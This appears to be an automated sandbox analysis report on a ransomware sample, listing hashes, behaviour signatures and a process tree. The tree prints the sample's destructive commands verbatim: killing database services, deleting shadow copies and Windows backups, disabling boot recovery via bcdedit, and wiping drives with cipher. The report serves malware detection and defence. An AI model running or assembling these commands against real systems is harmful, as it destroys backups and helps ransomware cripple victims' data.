Analysis

  • max time kernel
    149s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-08-2024 11:01

General

  • Target

    ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe

  • Size

    422KB

  • MD5

    f736ee661d70a5d7aa322f017e04b1d2

  • SHA1

    eee99e6b7c58ecc95c75cd52eb7ac02d812c1a54

  • SHA256

    ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679

  • SHA512

    23ff1b49955354a9a882ca2fd884157f75d937f00be2928acebab2a01fddcd018159cfd85df0e890cb2ecc0e40e6a02be926db29418928b320517ea6b538c8b8

  • SSDEEP

    6144:MTqhlztbElkd+s0zyykmkkES0J2txMLVesCjuwptsOXNZcX9PNCFR09KKPOeFhbb:RhDdkybr/J2tx2VeFusZXQJhkeFhbb

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (135) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 26 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3380
      • C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
        "C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • Enumerates connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3876
        • C:\Windows\SysWOW64\cmd.exe
          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1072
          • C:\Windows\system32\cmd.exe
            C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
            4⤵
              PID:2408
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:440
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1040
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlbrowser.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4992
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:768
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2412
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sql writer.exe
                5⤵
                • Kills process with taskkill
                PID:2440
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2468
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3188
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlserv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4792
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1616
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4300
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im msmdsrv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2920
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3600
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3128
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im MsDtsSrvr.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1136
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1224
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2644
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlceip.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1508
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1424
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1232
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im fdlauncher.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1180
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2824
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4072
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im Ssms.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3680
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1800
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
              4⤵
                PID:2828
                • C:\Windows\system32\taskkill.exe
                  taskkill -f -im SQLAGENT.EXE
                  5⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5036
            • C:\Windows\SysWOW64\cmd.exe
              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3656
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                4⤵
                  PID:2848
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im fdhost.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5052
              • C:\Windows\SysWOW64\cmd.exe
                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4648
                • C:\Windows\system32\cmd.exe
                  C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                  4⤵
                    PID:1604
                    • C:\Windows\system32\taskkill.exe
                      taskkill -f -im ReportingServicesService.exe
                      5⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:404
                • C:\Windows\SysWOW64\cmd.exe
                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3436
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                    4⤵
                      PID:3588
                      • C:\Windows\system32\taskkill.exe
                        taskkill -f -im msftesql.exe
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2808
                  • C:\Windows\SysWOW64\cmd.exe
                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4636
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                      4⤵
                        PID:2436
                        • C:\Windows\system32\taskkill.exe
                          taskkill -f -im pg_ctl.exe
                          5⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2408
                    • C:\Windows\SysWOW64\cmd.exe
                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3960
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                        4⤵
                          PID:3460
                          • C:\Windows\system32\taskkill.exe
                            taskkill -f -impostgres.exe
                            5⤵
                            • Kills process with taskkill
                            PID:844
                      • C:\Windows\SysWOW64\cmd.exe
                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:668
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                          4⤵
                            PID:4928
                            • C:\Windows\system32\net.exe
                              net stop MSSQLServerADHelper100
                              5⤵
                                PID:3308
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                  6⤵
                                    PID:2840
                            • C:\Windows\SysWOW64\cmd.exe
                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:4536
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                4⤵
                                  PID:368
                                  • C:\Windows\system32\net.exe
                                    net stop MSSQL$ISARS
                                    5⤵
                                      PID:4808
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 stop MSSQL$ISARS
                                        6⤵
                                          PID:664
                                  • C:\Windows\SysWOW64\cmd.exe
                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5008
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                      4⤵
                                        PID:2888
                                        • C:\Windows\system32\net.exe
                                          net stop MSSQL$MSFW
                                          5⤵
                                            PID:2752
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 stop MSSQL$MSFW
                                              6⤵
                                                PID:4872
                                        • C:\Windows\SysWOW64\cmd.exe
                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:612
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                            4⤵
                                              PID:1276
                                              • C:\Windows\system32\net.exe
                                                net stop SQLAgent$ISARS
                                                5⤵
                                                  PID:3640
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 stop SQLAgent$ISARS
                                                    6⤵
                                                      PID:4544
                                              • C:\Windows\SysWOW64\cmd.exe
                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1136
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                  4⤵
                                                    PID:1172
                                                    • C:\Windows\system32\net.exe
                                                      net stop SQLAgent$MSFW
                                                      5⤵
                                                        PID:992
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 stop SQLAgent$MSFW
                                                          6⤵
                                                            PID:3452
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1224
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
                                                        4⤵
                                                          PID:4380
                                                          • C:\Windows\system32\net.exe
                                                            net stop SQLBrowser
                                                            5⤵
                                                              PID:4780
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop SQLBrowser
                                                                6⤵
                                                                  PID:1212
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1424
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                              4⤵
                                                                PID:2024
                                                                • C:\Windows\system32\net.exe
                                                                  net stop REportServer$ISARS
                                                                  5⤵
                                                                    PID:1832
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 stop REportServer$ISARS
                                                                      6⤵
                                                                        PID:860
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2824
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
                                                                    4⤵
                                                                      PID:3908
                                                                      • C:\Windows\system32\net.exe
                                                                        net stop SQLWriter
                                                                        5⤵
                                                                          PID:4264
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop SQLWriter
                                                                            6⤵
                                                                              PID:1800
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1944
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                          4⤵
                                                                            PID:2220
                                                                            • C:\Windows\system32\vssadmin.exe
                                                                              vssadmin.exe Delete Shadows /All /Quiet
                                                                              5⤵
                                                                              • Interacts with shadow copies
                                                                              PID:828
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:556
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                            4⤵
                                                                              PID:4000
                                                                              • C:\Windows\system32\wbadmin.exe
                                                                                wbadmin delete backup -keepVersion:0 -quiet
                                                                                5⤵
                                                                                • Deletes system backups
                                                                                • Drops file in Windows directory
                                                                                PID:2880
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2676
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                              4⤵
                                                                                PID:3852
                                                                                • C:\Windows\system32\wbadmin.exe
                                                                                  wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                  5⤵
                                                                                  • Deletes System State backups
                                                                                  PID:1184
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:4772
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                4⤵
                                                                                  PID:1100
                                                                                  • C:\Windows\system32\wbadmin.exe
                                                                                    wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                    5⤵
                                                                                      PID:924
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2848
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                    4⤵
                                                                                      PID:5112
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic.exe SHADOWCOPY /nointeractive
                                                                                        5⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4284
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:884
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                      4⤵
                                                                                        PID:624
                                                                                        • C:\Windows\system32\bcdedit.exe
                                                                                          bcdedit.exe /set {default} recoverynabled No
                                                                                          5⤵
                                                                                          • Modifies boot configuration data using bcdedit
                                                                                          PID:2804
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2280
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                        4⤵
                                                                                          PID:4968
                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                            bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                            5⤵
                                                                                            • Modifies boot configuration data using bcdedit
                                                                                            PID:2728
                                                                                      • C:\Windows\SYSTEM32\cipher.exe
                                                                                        cipher /w:\\?\A:
                                                                                        3⤵
                                                                                        • Enumerates connected drives
                                                                                        PID:3524
                                                                                      • C:\Windows\SYSTEM32\cipher.exe
                                                                                        cipher /w:\\?\C:
                                                                                        3⤵
                                                                                          PID:4876
                                                                                        • C:\Windows\SYSTEM32\cipher.exe
                                                                                          cipher /w:\\?\F:
                                                                                          3⤵
                                                                                          • Enumerates connected drives
                                                                                          PID:1148
                                                                                      • C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
                                                                                        \\?\C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe -network
                                                                                        2⤵
                                                                                        • Adds Run key to start application
                                                                                        PID:3168
                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                      C:\Windows\system32\vssvc.exe
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:800

                                                                                    Network

                                                                                    MITRE ATT&CK Enterprise v15

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads